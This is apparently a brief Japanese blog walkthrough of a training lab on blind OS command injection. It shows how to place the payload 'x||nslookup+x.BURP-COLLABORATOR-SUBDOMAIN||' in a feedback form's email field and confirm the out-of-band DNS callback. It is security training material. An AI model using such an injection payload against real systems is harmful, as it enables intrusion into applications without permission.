Lab: Blind OS command injection with out-of-band interaction
submit feedbackをクリック
適当に文字を入れて送信
![](https://blog.esna.tech/wp-content/uploads/2023/01/2-59-1024x762.jpg)
このリクエスト
POST /feedback/submit
をリピータに
emailパラメータを
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
に変更
*BURP-COLLABORATOR-SUBDOMAINの部分を選択して、右クリック
Insert Collaborator payloadします(pro版)
![](https://blog.esna.tech/wp-content/uploads/2023/01/3-60-1024x763.jpg)
send
Collaboratorタブに移動して、Poll nowをクリック(pro版)
dnsプロトコルで、外部サーバーに送信された通信を確認できる
![](https://blog.esna.tech/wp-content/uploads/2023/01/4-49-1024x763.jpg)
クリアされていた!
![](https://blog.esna.tech/wp-content/uploads/2023/01/5-38-1024x763.jpg)
–)v
コメント